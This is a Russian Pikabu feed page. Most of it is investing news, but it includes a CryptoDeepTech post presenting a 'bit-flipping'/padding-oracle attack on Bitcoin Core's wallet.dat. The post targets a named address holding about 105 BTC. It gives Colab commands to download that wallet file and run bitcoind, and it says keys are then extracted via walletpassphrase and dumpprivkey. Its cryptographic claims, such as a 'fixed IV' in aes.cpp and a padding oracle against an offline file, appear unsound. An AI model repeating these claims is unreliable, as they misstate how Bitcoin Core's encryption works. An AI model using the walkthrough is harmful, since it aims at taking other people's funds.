Горячее
Лучшее
Свежее
Подписки
Сообщества
Блоги
Эксперты
#Круги добра
Войти
Забыли пароль?
или продолжите с
Создать аккаунт
Я хочу получать рассылки с лучшими постами за неделю
или
Восстановление пароля
Восстановление пароля
Получить код в Telegram
Войти с Яндекс ID Войти через VK ID
Создавая аккаунт, я соглашаюсь с правилами Пикабу и даю согласие на обработку персональных данных.
ПромокодыРаботаКурсыРекламаИгрыПополнение Steam
Пикабу Игры +1000 бесплатных онлайн игр Скайдом - пожалуй, самая красочная и интересная головоломка с действительно уникальными режимами игры!

Скайдом

Три в ряд, Головоломки, Казуальные

Играть

Топ прошлой недели

  • SpongeGod SpongeGod 1 пост
  • Uncleyogurt007 Uncleyogurt007 9 постов
  • ZaTaS ZaTaS 3 поста
Посмотреть весь топ

Лучшие посты недели

Рассылка Пикабу: отправляем самые рейтинговые материалы за 7 дней 🔥

Нажимая кнопку «Подписаться на рассылку», я соглашаюсь с Правилами Пикабу и даю согласие на обработку персональных данных.

Спасибо, что подписались!
Пожалуйста, проверьте почту 😊

Помощь Кодекс Пикабу Команда Пикабу Моб. приложение
Правила соцсети О рекомендациях О компании
Промокоды Биг Гик Промокоды Lamoda Промокоды МВидео Промокоды Яндекс Директ Промокоды Отелло Промокоды Aroma Butik Промокоды Яндекс Путешествия Постила Футбол сегодня
0 просмотренных постов скрыто
12
svoiinvestor
svoiinvestor
4 дня назад
Лига Инвесторов

Инфляция в августе — завершающая неделя дефляционная, задел на сентябрь хороший. Топливо и бюджет не отступают, насколько снизят ставку?⁠⁠

Инфляция в августе — завершающая неделя дефляционная, задел на сентябрь хороший. Топливо и бюджет не отступают, насколько снизят ставку? Политика, Биржа, Фондовый рынок, Инвестиции, Аналитика, Экономика, Инфляция, Ключевая ставка, Доллары, Валюта, Рубль, Бюджет, Кредит, Облигации, Нефть, Санкции, Центральный банк РФ, Сбербанк, Отчет, Вклад, Длиннопост

Ⓜ️ По данным Росстата, за период с 26 августа по 1 сентября ИПЦ снизился на -0,08% (прошлые недели — 0,02%, -0,04%), с начала месяца -0,01%, с начала года — 4,10% (годовая — 8,3%). В августе по недельным данным ИПЦ составила -0,24%, что выводит нас на ~3% saar, это гораздо меньше, чем закладывал регулятор (4%), но необходимо дождаться ещё месячного пересчёта (недельная корзина включает мало услуг, а они растут опережающими темпами). Дефляционная неделя — это, конечно, сюрприз (после 5 недель подряд дефляции, случился рост) и перенос этой дефляции на сентябрь хороший такой знак для Центробанка. Мы знаем, что ЦБ снизил прогноз инфляции на этот год до 6-7% (было 7-8%) и среднего значения ставки до конца года до 16,3-18% (ставку до конца года могут оставить без изменений или снизить до 14%). Отмечаем факторы, влияющие на инфляцию:

🗣 Из потребительских цен на нефтепродукты следует, что розничные цены на бензин подорожали за неделю на 0,30% (прошлая неделя — 0,60%), дизтопливо на 0,07% (прошлая неделя — 0,11%), динамика снизилась (вес бензина в ИПЦ весомый ~4,4%). С учётом повышения цен на топливо (происходят атаки на НПЗ+сезонность, а это дефицит топлива из-за ремонтных работ), правительство установило полный запрет на поставки бензина за рубеж до конца октября. При этом правительство готовит изменение демпфера, чтобы нефтяные компании смогли поднять цены на топливо выше.

Инфляция в августе — завершающая неделя дефляционная, задел на сентябрь хороший. Топливо и бюджет не отступают, насколько снизят ставку? Политика, Биржа, Фондовый рынок, Инвестиции, Аналитика, Экономика, Инфляция, Ключевая ставка, Доллары, Валюта, Рубль, Бюджет, Кредит, Облигации, Нефть, Санкции, Центральный банк РФ, Сбербанк, Отчет, Вклад, Длиннопост

🗣 Данные Сбериндекса по изменению потребительских расходов к 31 августа увеличились, но находятся на уровне намного ниже прошлогодних значений (9,5% vs. 15,3%).

🗣 Регулятор охладил розничное кредитование. Отчёт Сбера за июль: портфель жилищных кредитов вырос на 1,2% за месяц (в июне +0,9%), банк выдал 228₽ млрд ипотечных кредитов (+9,6% г/г, в мае 200₽ млрд). Портфель потреб. кредитов снизился на 0,3% за месяц (в июне -1,9%), банк выдал 175₽ млрд потреб. кредитов (-37,7% г/г). Корп. кредитный портфель увеличился на 0,9% (в июне +0,4%), корпоративным клиентам было выдано 2₽ трлн кредитов (0% г/г, в июне 1,9₽ трлн, рост от месяца к месяцу связан с перекредитованием).

🗣 Теперь регулятор устанавливает самостоятельно курсы валют с учётом внебиржевых данных ($ — 81,5₽). После снижения ставки ₽ слегка ослаб, но держится ниже 80₽ за $, если курс отпустить, то неминуемо инфляционная спираль раскрутится, а если его "держать" на этом уровне (жёсткая ДКП этому способствует), то пополнение бюджета под угрозой (пока что выбор в пользу инфляции).

🗣 Минфин планирует занять в 2025 г. 4,781₽ трлн (погашения — 1,416₽ трлн), сумма рекордная с начала пандемии и выше, чем в 2024 году (3,92₽ трлн). Значит, мы ощутим инфляционный всплеск при тратах, если придётся занимать сверх этой суммы. Дефицит федерального бюджета по итогам 7 месяцев составил 4,879₽ трлн или 2,2% ВВП, даже при новых правках бюджета перерасход уже составляет 1,1₽ трлн. Проблема вырисовывается и в пополнении бюджета — НГД доходы просели из-за курса ₽ и цены Urals, к 28 августа потрачено 2,3₽ трлн, при доходах в 1₽ трлн.

Инфляция в августе — завершающая неделя дефляционная, задел на сентябрь хороший. Топливо и бюджет не отступают, насколько снизят ставку? Политика, Биржа, Фондовый рынок, Инвестиции, Аналитика, Экономика, Инфляция, Ключевая ставка, Доллары, Валюта, Рубль, Бюджет, Кредит, Облигации, Нефть, Санкции, Центральный банк РФ, Сбербанк, Отчет, Вклад, Длиннопост

📌 При таких тратах дефицит бюджета необходимо чем-то восполнять, ₽ остаётся крепким, цена Urals находится на уровне 60$ за баррель, вырисовывается дилемма (необходимо давить на курс — тогда темпы инфляции пойдут ввысь, займ через ОФЗ по сути эмиссия денег, т.к. кредит банков = рост М2, опять же раскрутка инфляции). По словам Набиуллиной прогноз предполагает, что до конца года на отдельных заседаниях возможно снижение, равно как и паузы. Диапазон широкий, из-за чего? Дефицит в бюджете уже 6,2₽ трлн, при продолжении СВО этот разрыв будет только увеличиваться, а это проинфляционный фактор (в совокупности проинфляционные риски продолжают преобладать — Набиуллина), но именно темпы инфляции в августе с переходом на сентябрь могут побудить ЦБ снизить ставку на 1-2% на ближайшем заседании.

С уважением, Владислав Кофанов

Телеграмм-канал: t.me/svoiinvestor

Показать полностью 2
[моё] Политика Биржа Фондовый рынок Инвестиции Аналитика Экономика Инфляция Ключевая ставка Доллары Валюта Рубль Бюджет Кредит Облигации Нефть Санкции Центральный банк РФ Сбербанк Отчет Вклад Длиннопост
0
4
MizyaMS
MizyaMS
4 дня назад
Лига Инвесторов
Серия Еженедельные обзоры рынка

Еженедельный обзор рынков: рубль дешевеет перед заседанием ЦБ - акции и ОФЗ растут. Золотое обращение 2.0?⁠⁠

В этом выпуске:

🔹Рубль падает на ожиданиях снижения ключевой ставки ЦБ и оживлении спроса на валюту

🔹 Доллар DXY продолжает снижаться к основным валютам

🔹 Нефть в ожидании решения ОПЕК+ в воскресение

🔹 Золото начинает вторую фазу роста

🔹 Минфин готовит золотые кредиты и депозиты, снова 20-е годы ХХ века?

🔹 Экономика США не создает новые рабочие места

🔹 Последняя неделя дезинфляции – идем на 6% по итогам года, а может быть и ниже

🔹 ОФЗ вернулись к росту

🔹 Банки закладывают снижение ключевой ставки и готовятся конкурировать за вкладчика осенью

🔹 Динамика индексов MOEX и RTS перед заседанием ЦБ

Показать полностью
[моё] Валюта Облигации Инвестиции Финансы Ключевая ставка Видео RUTUBE Длиннопост
0
FakapDaily
FakapDaily
4 дня назад

Tesla предложила Маску компенсационный пакет на 81 ТРИЛЛИОН рублей. Чтобы вы понимали — это примерно три нынешних состояния Илона⁠⁠

Tesla предложила Маску компенсационный пакет на 81 ТРИЛЛИОН рублей. Чтобы вы понимали — это примерно три нынешних состояния Илона Доллары, Илон Маск, Триллион, Валюта

Да подпишись ты уже

Условие такое: поднять капитализацию Tesla с $1 трлн до $8,5 трлн. То есть добавить $7,5 трлн рыночной стоимости за 10 лет — что практически невозможно.

Коллеги, обещаю каждому 25785368447 долларов, если на этом посте будет 3000❤️

https://ria.ru/20250905/mask-2040040792.html

Показать полностью 1
Доллары Илон Маск Триллион Валюта
3
2
CryptoDeepTech
CryptoDeepTech
4 дня назад

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1]⁠⁠

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В программе Bitcoin Core для защиты пароля кошелька используется симметричный криптографический алгоритм AES-256-CBC. Этот алгоритм применяется для шифрования файла кошелька (wallet.dat), где хранятся закрытые ключи пользователя. Степень защиты обеспечивается 256-битным ключом, который создается из пароля пользователя. Также для генерации ключей Bitcoin Core использует криптографию на основе эллиптических кривых, а именно кривую secp256k1, которая лежит в основе создания публичных и приватных ключей транзакций.

AES-256-CBC и не хранит пароль напрямую, а использует его для генерации ключа шифрования. Однако в исследовании отмечается, что в реализации Bitcoin Core отсутствует смена ключа шифрования закрытых ключей, что может снижать защиту при повторном использовании пароля.

AES-256-CBC (Advanced Encryption Standard с длиной ключа 256 бит в режиме сцепления блоков — CBC, Cipher Block Chaining) — один из наиболее распространённых алгоритмов симметричного шифрования для защиты информации.

Принято считать, что AES-256-CBC при определенных комбинациях уязвима к различным атакам. Разберём основной вид атаки такие как Bit-flipping attack , которые применимы к AES-256-CBC.

При Bit-flipping attack AES-256-CBC не обеспечивает контроль целостности, что делает возможным модификацию шифротекста для контролируемого изменения расшифрованных данных. Это применимо, например, при реализации авторизации, где взломщик может изменить права доступа или другие параметры, просто изменив определённые биты в шифротексте


Как Bit-flipping Attack влияет на безопасность кошелька Bitcoin Core

Bit-flipping Attack в основном влияет на режим шифрования CBC (Cipher Block Chaining) и работает за счёт уязвимости режима к контролируемому изменению битов в зашифрованном сообщении. В CBC каждый блок шифротекста зависит от предыдущего блока и плейнтекста через операцию XOR, поэтому изменение одного бита в зашифрованном блоке приводит к предсказуемому изменению соответствующих битов в расшифрованном тексте следующего блока.



Процесс работы Bit-flipping Attack:

  • При расшифровке блока шифротекста Ci происходит операция XOR с предыдущим блоком шифротекста Ci-1, чтобы получить исходный текст Pi.

  • Если атакующий изменит один или несколько битов в блоке Ci-1, то при расшифровке изменится соответствующий бит в блоке Pi, управляемый изменениями в Ci-1.

  • При этом блок Ci после изменений становится некорректным и при расшифровке будет повреждён, но изменение в предыдущем блоке позволяет повреждать (манипулировать) расшифрованным текстом управляемым образом в следующем блоке.

Это манипулятивная расшифровка влияет на безопасность криптографического алгоритма AES-256-CBC которую использует кошелек Bitcoin Core:

  • Такая манипуляция позволяет злоумышленнику в некоторых случаях менять расшифрованные данные без знания ключа, например, изменять параметры доступа, права или другие данные, если не применяется отдельный механизм аутентификации и проверки целостности.

  • Битфлип-атака на CBC демонстрирует его «модифицируемость» (malleability), то есть отсутствие встроенной защиты целостности данных.

  • В реальных системах атака эффективна, если нет дополнительной защиты — такой как HMAC или использование AEAD режимов (например, AES-GCM), которые обеспечивают аутентификацию и предотвращают изменение данных без обнаружения.

Опасность неиспользования проверки целостности данных вместе с режимом AES-256-CBC связана с тем, что CBC сам по себе не обеспечивает защиту от модификации зашифрованного сообщения. Это делает возможными битфлип-атаки, при которых злоумышленник может контролируемо изменить зашифрованные данные без знания ключа.


Важно отметить что атакующий перебирает байты, контролируя изменения в шифротексте и анализируя ответы системы, постепенно восстанавливая оригинальный пароль в бинарном виде, особым образом изменяя блоки.

В итоге, восстановив пароль, злоумышленник может разблокировать кошелёк через команду Bitcoin Core walletpassphrase и получить приватные ключи командой dumpprivkey.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://en.wikipedia.org/wiki/Bit-flipping_attack


AES256CBCEncrypt и AES256CBCDecrypt для работы в режиме CBC (Cipher Block Chaining)

Функция файла aes.cpp в кошельке Bitcoin Core — обеспечение криптографического шифрования и дешифрования данных с использованием алгоритма AES-256, также функция файла aes.cpp реализует классы AES256Encrypt и AES256Decrypt для блочного шифрования/дешифрования данных размером 16 байт по алгоритму AES-256. Исходный код выполняет основные задачи инициализация контекста шифрования/дешифрования с заданным приватным ключом. Наши наблюдение в процессе криптоанализа выявили нарушение в работе режима CBC (Cipher Block Chaining): где применение XOR к каждому блоку с предыдущим (или IV для первого блока), определяет слабую криптостойкость к общему стандарту AES к которому злоумышленник может применить Bit-flipping Attack. Данная криптографическая уязвимость связана с неправильным использованием вектора инициализации (IV) в режиме CBC (Cipher Block Chaining).


В коде функции CBCEncrypt (в строке №57):

memcpy(mixed, iv, AES_BLOCKSIZE);


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L57


IV копируется в локальный массив mixed и далее используется для XOR с первым блоком данных. Однако IV передается в конструктор AES256CBCEncrypt и копируется один раз в поле класса iv (в строке №121):



Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L121


В CBC режиме шифрования IV должен быть либо случайным, либо уникальным и не повторяться для разных сообщений с одним ключом, чтобы обеспечить безопасность. Если IV фиксирован и не меняется, это открывает уязвимость — повторяющаяся структура позволит злоумышленнику провести атаки по выявлению закономерностей в зашифрованных данных, где хранятся секретные данные как пароли и приватные ключи кошелька Bitcoin Core.



Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L70


Bit-flipping attack на файл wallet.dat реализован через XOR с числом паддинга, что отличается от стандарта PKCS#7, где паддинг просто добавляется как отдельные байты. Такой XOR-подход не является безопасным и может привести к неверному шифрованию и потенциальным уязвимостям при расшифровке. Также в функции CBCDecrypt проверка и удаление паддинга реализована нестандартно и может быть уязвимой к таким типам атаки как: Bit-flipping attack & Padding oracle attack



Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://github.com/keyhunters/bitcoin/blob/master/src/crypto/aes.cpp#L106


Практическая часть

Перейдем к практической части из теории нам известна уязвимость с помощью которого можно реализовать Bit-flipping attack на файл wallet.dat , так как уязвимость возникает из-за использования фиксированного IV и нестандартной реализации паддинга в функциях CBCEncrypt и CBCDecrypt. Эти моменты критичны для безопасности режима CBC (Cipher Block Chaining) и могут быть истолкованы как «в строке с memcpy(mixed, iv, AES_BLOCKSIZE);» в функции CBCEncrypt и в блоке обработки паддинга.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Рассмотрим пример с использованием Bitcoin-кошелька по адресу: 16A5RFckRNW6fZzfjCGSneD3PApACLRwix. В данном кошельке были утеряны монеты на сумму 105.68557389 BTC, что на август 2025 года эквивалентно примерно 12,134,500 USD.

Для демонстрации атаки в ознакомительных целях используем инструменты и среды, такие как Jupyter Notebook или Google Colab. Сначала загружаем зашифрованный файл wallet.dat, содержащий информацию кошелька. Далее пошагово изменяем отдельные биты в блоках шифротекста и отправляем модифицированные версии системе для анализа её реакции.

Этот метод атаки, известный как Bit-flipping attack в контексте wallet.dat , представляет собой не просто случайное изменение данных, а сложный поэтапный процесс, при котором отбираются корректные изменения с учётом реакции системы на правильность паддинга (выравнивания) при расшифровке данных с использованием AES-256-CBC.

Используя такую стратегию, инструменты строят бинарное значение пароля, что в итоге позволяет получить пароль для расшифровки wallet.dat и доступ к Bitcoin Core без знания первоначального ключа шифрования. Эта атака основана на использовании уязвимости, называемой Padding Oracle Attack, которая эксплуатирует информацию об ошибках выравнивания при дешифровке, предоставляемую системой.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

16A5RFckRNW6fZzfjCGSneD3PApACLRwix


Основные инструменты и команды, применяемые для таких атак:

Google Colab (Colaboratory) — это облачная платформа, предоставляющая интерактивные Jupyter-ноутбуки, где можно писать и запускать код для различных языков программирование. Он особенно полезен для анализа данных, машинного обучения и работы с Snyc AI, так как предоставляет бесплатный доступ к мощным вычислительным ресурсам, таким как GPU и TPU. Важным преимуществом является возможность выполнять системные команды, как в обычном терминале Linux, через ячейки с префиксом ! для интеграции с внешними утилитами и скриптами.


Google Colab

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

https://colab.research.google.com/drive/1tCCSUtjl6seE9lqkFLcLodE96mj5uuHR


Bitcoin Core и установка bitcoind & bitcoin-cli

Обновление списков пакетов и установка системных зависимостей

!apt-get update
!apt-get install -y software-properties-common

Примечание:

  • Первая команда обновляет локальный индекс доступных пакетов и их версий в системе Ubuntu, чтобы обеспечить актуальность данных при установке программ.

  • Вторая команда устанавливает пакет software-properties-common, который предоставляет инструменты управления дополнительными репозиториями и зависимостями.

  • C научным пониманием это подготовительный этап типичен при работе в любой Linux-среде, включая виртуальные. Обновление списков пакетов обеспечивает, что последующая установка программ будет использовать последние стабильные версии и зависимости, что важно для безопасности и совместимости ПО.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Добавление репозитория Bitcoin Core и установка bitcoind (вместе с bitcoin-cli)

Альтернативный способ: загрузка и распаковка бинарных файлов Bitcoin Core из архива

!wget https://bitcoin.org/bin/bitcoin-core-0.18.0/bitcoin-0.18.0-x...
!tar -xzf bitcoin-0.18.0-x86_64-linux-gnu.tar.gz

Примечание:

  • add-apt-repository добавляет официальный PPA (Personal Package Archive) Bitcoin Core в систему — источник актуальных пакетов Bitcoin.

  • После обновления индекса пакетов система устанавливает пакет bitcoind, который включает в себя демона биткоина (Bitcoin server) и клиентскую утилиту bitcoin-cli.

  • Загружает архив с предсобранными бинарными файлами Bitcoin Core указанной версии.

  • Распаковывает архив, извлекая байтовые файлы, включая bitcoind и bitcoin-cli.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

С научной понимании Bitcoind — это полнофункциональный узел Bitcoin с серверной частью, который валидирует транзакции и блоки, поддерживает сеть и хранит блокчейн локально. bitcoin-cli — клиентский инструмент для взаимодействия с демоном через JSON-RPC интерфейс, управляя кошельками, транзакциями и запросами к блокчейну. Установка из PPA гарантирует корректную интеграцию и обновления. Такой способ позволяет получить необходимое программное обеспечение без зависимости от системных репозиториев, что бывает важно, если требуется определённая версия или если PPA недоступен в текущей среде. Это классический метод распространения программного обеспечения с гарантированным контролем версии и среды.


Команда cd переключается в директорию с бинарными файлами.

Выполнения команды — смена текущей рабочей директории на /content/bitcoin-0.18.0/bin, что подтверждается выводом пути.

cd bitcoin-0.18.0/bin/

Описание и действие:

  • Команда cd (от английского «change directory» — сменить директорию) используется в операционных системах семейства Unix/Linux и в средах терминала, таких как Google Colab, для перехода из текущей рабочей директории в указанную директорию. В данном случае команда меняет текущую папку на директорию bin, которая находится внутри каталога bitcoin-0.18.0. Это позволяет перейти в папку, где, вероятно, находятся исполняемые файлы или скрипты, связанные с программным обеспечением Bitcoin версии 0.18.0.

  • В контексте операционных систем, терминал или командная строка — это интерфейс, через который пользователь взаимодействует с системой, вводя текстовые команды. Текущая рабочая директория — это та папка в файловой системе, в рамках которой по умолчанию выполняются все команды, если не указано иное.

  • Команда cd позволяет изменять эту рабочую директорию, что необходимо для организации удобного доступа к нужным файлам и папкам.

  • Путь bitcoin-0.18.0/bin/ может быть как относительным (от текущего каталога), так и абсолютным (начинающимся с корня /). В Google Colab корневая директория по умолчанию — /content/, и при работе с проектами часто структура каталогов отражает вложенность программного обеспечения или данных.

  • Перемещение в директорию bin обычно связано с необходимостью получения доступа к бинарным файлам (исполняемым программам), которые расположены в этом каталоге. Это позволяет выполнять команды или скрипты, входящие в состав программного продукта, например, запускающих узлы биткоина, тестирующих сеть или работающих с кошельками.

  • Таким образом, выполнение команды cd bitcoin-0.18.0/bin/ задаёт контекст выполнения для дальнейшей работы с компонентами Bitcoin Core 0.18.0 внутри Google Colab.


Проверка установки bitcoin-cli

!./bitcoin-cli --version

Описание:

  • Запускает команду bitcoin-cli из локальной директории для проверки работоспособности и версии утилиты. При правильном выполнении выведет строку с информацией о версии клиента.

  • Запуск бинарных файлов из локальной директории — стандартная практика при ручной установке ПО. В Colab и других облачных средах это удобно для использования специфичных версий без системной установки.

  • Контроль версии важен для совместимости с сетевым протоколом и ожидаемой функциональностью, а также для отладки при возникновении ошибок.


Результат:

Bitcoin Core RPC client version v0.18.0


Результат выводит версию установленной утилиты bitcoin-cli, проверяя успешность установки и доступность команды для вызова.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Загрузка файлов wallet.dat & aes.cpp

Запустим команду для загрузки файла wallet.dat

!wget https://github.com/keyhunters/Biggest-Lost-Bitcoin-Wallets-List/raw/refs/heads/main/105.68 BTC/wallet.dat

Описание и действие:

  • Команда wget служит для скачивания файлов из интернета по протоколу HTTPS.

  • Здесь мы загружаем файл wallet.dat – это бинарный файл, хранящий зашифрованные приватные ключи, адреса и другую критически важную информацию Bitcoin Core кошелька.

  • Файл wallet.dat зашифрован с использованием стандарта AES-256-CBC, где приватные ключи защищены с помощью мастер-ключа и пароля.

  • Такой файл используется для управления и хранения средств в Bitcoin. В ходе научного исследования и атак, например padding oracle, этот файл анализируется и модифицируется для восстановления утерянных паролей или ключей.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В научное понимание файл wallet.dat играет роль защищённого контейнера для криптографических ключей, и его целостность и конфиденциальность обеспечиваются алгоритмами шифрования, основанными на AES. Загрузка файла позволяет работать с реальными данными кошелька, что необходимо для исследований уязвимостей и тестирования методов криптоанализа, например, подобных атакам на padding oracle.


Запустим команду для загрузки файла алгоритма aes.cpp

!wget https://github.com/keyhunters/bitcoin/raw/refs/heads/master/...

Описание и действие:

  • Команда загружает исходный файл aes.cpp, содержащий исходный код реализации AES алгоритма шифрования, используемый в Bitcoin Core.

  • Этот файл важен для понимания того, как именно происходит шифрование и дешифровка данных в wallet.dat.

  • Исходный код помогает исследователям понять логику применения AES-256-CBC, применение выравнивания (padding), фиксирование ошибок и особенности реализации криптоалгоритмов.

  • Такой код можно использовать в Jupyter Notebook или Google Colab для написания собственных скриптов дешифровки или моделирования атак.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

В научное понимание криптоанализ исходного кода AES алгоритма позволяет глубоко понять принципы работы симметричного шифрования в Bitcoin Core, особенности режима CBC (Cipher Block Chaining), важность корректного паддинга и потенциальные уязвимости, которые могут использоваться при атаке padding oracle. Это способствует более научно обоснованной разработке методов восстановления паролей и ключей.


Общие научные сведения по контексту:

  • AES-256-CBC: Способ симметричного блочного шифрования, где применяются операции XOR с предыдущим зашифрованным блоком (CBC — Cipher Block Chaining) для повышения безопасности. Паддинг (выравнивание) данных на последнем блоке обеспечивает корректную длину входа.

  • wallet.dat: Хранит зашифрованные приватные ключи и метаданные. Пароль пользователя используется для генерации ключа шифрования мастер-ключа с помощью функции, как EVP_BytesToKey OpenSSL, что увеличивает стойкость шифра.

  • Padding Oracle Attack: Хакерская атака, эксплуатирующая наличие подробных сообщений об ошибках при неверном паддинге, что постепенно позволяет взломать ключ шифрования.

  • Анализ исходного кода aes.cpp: Ключ для понимания реализации шифра и корректного построения атак, изучения уязвимостей и разработки средств их предотвращения.


Bit-flipping attack на Wallet.dat: Риски использования AES-256-CBC грозит утечкой закрытых ключей Bitcoin Core: [Часть №1] Криптовалюта, Финансовая грамотность, Биткоины, YouTube, Трейдинг, Арбитраж криптовалюты, Заработок в интернете, Заработок, Вклад, Облигации, Пассивный доход, Дивиденды, Ключевая ставка, Валюта, Инвестиции в акции, Видео, Telegram (ссылка), Яндекс Дзен (ссылка), YouTube (ссылка), Длиннопост

Запуск биткоин-демона bitcoind с указанием кошелька

!./bitcoind -daemon -wallet=/content/bitcoin-0.18.0/bin/wallet.dat

Запускаем биткоин-демон в фоновом режиме (-daemon) и указывает использовать конкретный файл кошелька wallet.dat, расположенный в указанном пути. Bitcoind — основной компонент для взаимодействия с сетью Bitcoin. Демон обрабатывает все сетевые операции, хранит полный локальный блокчейн и управляет кошельком. Запуск с указанием файла wallet.dat позволяет работать с конкретным зашифрованным кошельком (ключами и адресами), что важно для анализа состояния и управления средствами.


